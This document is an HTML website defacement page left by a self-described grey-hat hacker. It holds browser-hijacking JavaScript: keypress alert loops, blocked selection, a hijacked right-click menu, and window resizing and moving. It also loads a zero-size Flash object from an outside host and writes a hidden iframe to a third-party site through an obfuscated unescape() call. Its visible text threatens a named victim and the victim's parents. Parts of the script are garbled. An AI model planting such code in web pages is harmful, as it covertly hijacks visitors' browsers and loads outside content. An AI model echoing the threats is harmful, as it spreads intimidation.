<html>
<head>
<title>--==[[ Hacked by Asif Shariar !! ]]==--</title>
<script>alert("Hacked by Asif Shariar! Click Ok to learn more..")</script>
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<script>
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("Hacked by Asif Shariar! Click Ok to learn more..");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Hacked by Asif Shariar! Click Ok to learn more..');
}
</script>
<script language="javascript" type="text/javascript">
<!--
var text='i Love you ... =)';
var delay = 40;
var Xoff = 0;
CURSOR (- VALUES GO TO LEFT)
var Yoff = -30;
CURSOR (- VALUES GO UP)
var txtw = 14;
CHARACTER OCCUPIES
var beghtml = '<font color="#FF0000"><b>';
THAT EFFECTS WHOLE TEXT STRING SUCH AS FONT COLOR, SIZE, ETC.
var endhtml = '<\/b><\/font>';
ABOVE SETTING IS USED.
ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)?
true : false;
ie4 = (document.all && !document.getElementById)? true : false;
ie5 = (document.all && document.getElementById)? true : false;
ns6 = (document.getElementById && navigator.appName.indexOf
("Netscape")>=0 )? true: false;
var txtA = new Array();
text=text.split('');
var x1=0;
var y1=-1000;
var t='';
for(i=1; i <= text.length; i++) {
t+=(ns4)? '<layer name="txt'+i+'" top="-100" left="0"
width="'+txtw+'" height="1">' : '<div id="txt'+i+'" style="position:absolute;
top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';
t+=beghtml+text[i-1]+endhtml;
t+=(ns4)? '<\/layer>' : '<\/div>';
}
document.write(t);
function moveid(id,x,y) {
if(ns4) {
id.moveTo(x,y);
}else{
id.style.left=x+'px';
id.style.top=y+'px';
}
}
function animate(evt) {
x1=Xoff+((ie4||ie5)?
event.clientX+document.body.scrollLeft:evt.pageX);
y1=Yoff+((ie4||ie5)?
event.clientY+document.body.scrollTop:evt.pageY);
}
function getidleft(id) {
if(ns4)
return id.left;
else
return parseInt(id.style.left);
}
function getidtop(id) {
if(ns4)
return id.top;
else
return parseInt(id.style.top);
}
function getwindowwidth() {
if(ie4||ie5)
return
document.body.clientWidth+document.body.scrollLeft;
else
return window.innerWidth+pageXOffset;
}
function movetxts() {
for(i=text.length;i>1;i=i-1) {
if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()) {
moveid(txtA[i-1],0,-1000);
moveid(txtA[i],0,-1000);
}else
moveid(txtA[i], getidleft(txtA[i-1])+txtw,
getidtop(txtA[i-1]));
}
moveid(txtA[1],x1,y1);
}
window.onload=function() {
for(i=1;i<=text.length;i++)
txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?
document.all['txt'+i]:document.getElementById('txt'+i);
if(ns4)
document.captureEvents
(Event.MOUSEMOVE);
document.onmousemove=animate;
setInterval('movetxts()',delay);
}
-->
</script>
<SCRIPT>
window.scrollBy(0, 1)
window.resizeTo(0,0)
window.moveTo(0,0)
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.05
mym=mym/1.05
mx=mx+mxm
my=my-mym
mxm=mxm+(400-mx)/100
mym=mym-(300-my)/100
window.moveTo(mx,my)
rmxm=Math.round(mxm/10)
rmym=Math.round(mym/10)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = "Cljck"
alert("Cljck")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0.3)
}
</SCRIPT> <style type="text/css">
<!--
body,td,th {
color: #CCCCCC;
}
body {
background-color: #000000;
}
.style26 {
font-size: 50px;
color: #FF0000;
}
.style36 {color: #999999}
.style37 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
}
.style38 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 36px;
}
.style39 {
color: #FF0000;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 18px;
}
.style40 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 18px;
}
.style41 {
color: #CCCCCC;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
-->
</style>
</head>
<body bgcolor="#000000" spellcheck="false">
<div><font color="#00ff00"> </font>
<link REL="SHORTCUT ICON"
HREF="http://i55.tinypic.com/2z7ld11.gif"></head>
<body
background="http://m.pimpmyspace.org/pimp/1/2d/2de4890370a9f599fd7a.
gif" bgcolor="#000000">
<center>
<font color="Green"><b><big><big><big><big><blink>You just Hacked by AH !!
</font> </span> <br> </font> <img
src="http://lh3.ggpht.com/rosangala.moreira/SDOJyMNL0yI/AAAAAAAAAlY/
1nQWHr4PReA/s400/a01.png" border="0" height="120"
width="100"></b></span></font></span> <font color="green"> .:: I am Asif Shariar a Grey Hat hacker! =) ::. </font> <img
src="http://lh3.ggpht.com/rosangala.moreira/SDOJyMNL0yI/AAAAAAAAAlY/
1nQWHr4PReA/s400/a01.png" border="0" height="120"
width="100"></b></span></font></span></blink></big></big></big></big></b
></font></center>
<center>
<img border="0" src="
http://lh3.ggpht.com/_EUVla-
utiuY/S2rTEhmiNAI/AAAAAAAABNU/iBFljtI4p3g/s400/236%5B1%5D.png"
></P>
<br>
<p style="font-family:vendara;font-size:35px;color:red">
Sweetheart ,
If You go against me you will get hacked again and again.<br>
I hacked your laptop,Mobile, Wifi network & now Your website!
</p>
<p style="font-family:vendara;font-size:30px;color:green">
<br>
Don't make me more angry I'm agnry bird & hacker
you cant't beat me kid.
Look at my face carefully!!
You can't forget my face ever after this mastermind hacking by me
<br>
<b><img
src="https://scontent.fdac99-1.fna.fbcdn.net/v/t1.0-9/71970387_134702051261356_2760497793217855488_o.jpg?_nc_cat=111&ccb=2&_nc_sid=174925&_nc_eui2=AeHcIc_OtnRSrHLAdYgt9pL6GOs-qWC9ResY6z6pYL1F66GDnRzWCGvBB_B1d7TsceJpEUH07ixgLFw6C3ZXpRoo&_nc_ohc=07ssJIslTcoAX-0m7d7&_nc_ht=scontent.fdac99-1.fna&oh=bf53fbc6186f9366d340d79765839312&oe=5FE21489" border="0" height="163"
width="263"></b></span></font></span><font color="whitesmoke"
face="impact" size="5"> <font color="whitesmoke" face="impact"
size="5"> </font><font color="green" face="impact"
size="7">***</font><font color="green" face="impact" size="7"> </font>
<font color="green" face="impact" size="7"> </font><font color="green"
face="impact" size="7"> </font>
<font color="green" face="impact" size="7"><span lang="en-
us">***</span></font><font color="green" face="impact" size="5">
</font><span style=""><font color="#00ff00" face="Tempus
Sans ITC" size="6"><span style=""><b><img
src="https://scontent.fdac99-1.fna.fbcdn.net/v/t1.0-9/115970537_339817300749829_898605161465209298_o.jpg?_nc_cat=104&ccb=2&_nc_sid=09cbfe&_nc_eui2=AeEu43NbN4YtoHKJKTCI8q6AgOY6h1gOy-2A5jqHWA7L7aZ1QrOlvr6VMda6YHpU0X00wOR71jhnGCl0-xZUqgqq&_nc_ohc=9hfN7lIE4v4AX99P2x_&_nc_ht=scontent.fdac99-1.fna&oh=e6f239c884d3def30cde614e6287cb4b&oe=5FE0E9CF" border="0" height="163"
width="216"></b></span></font></span><font color="green" face="impact"
size="5"><br>
<fONT COLOR="WHITE">With this letter, I just want to
convey to you that if we are
linked together, I'll provide you
all objects & libraries necessary
for a human being to live an
error free life.
I anticipate that nobody has
already logged in to your
database so that my connect
script will fail.
And its all but certain that if
this happened to me, my system
will crash beyond recovery.
Kindly interpret this letter
properly and grant me all
privileges of your inbox. Error
free.. </font>
<p align="center"><b><font color="#ffffff" face="Comic Sans MS" size="6">
</font></b></p>
<br>
<br>
<center><p><font face="Courier New"><font style="font-size: 17pt"
color="#FF0000">Regards,</font><font color="#FF0000" style="font-size:
17pt">
<font style="font-size: 17pt" color="#FF0000" face="Courier New">
My enemy<font style="font-size: 17pt" color="#FF0000"> <font
style="font-size: 17pt" color="#FF0000">
Today You got hacked !
Tomorrow your father , mother will be get hacker by AH.
Take Love. Have a good day!
</font></P>
</font>
<br><Br>
</center>
</head>
<style type="text/css">#cot_tl_fixed{background-
color:green;position:fixed;bottom:0px;font-size:20px;left:0px;padding:3px
0;clip:_top:expression
(document.documentElement.scrollTop+document.documentElement.clien
tHeight-this.clientHeight);_left:expression
(document.documentElement.scrollLeft +
document.documentElement.clientWidth - offsetWidth);}</style>
<span style="color: #FFFFFF;">
<body>
<object width="0" height="0"><param name="movie"
value="http://fsh.chirkutonorkut.com/albums/HI/ajab10.swf"></param><par
am name="allowFullScreen" value="true"></param><param
name="allowscriptaccess" value="always"></param><embed
src="http://fsh.chirkutonorkut.com/albums/HI/ajab10.swf" width="0"
height="0"></embed></object><script>
<!--
document.write(unescape("%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E"));
</script>
</body>
</html>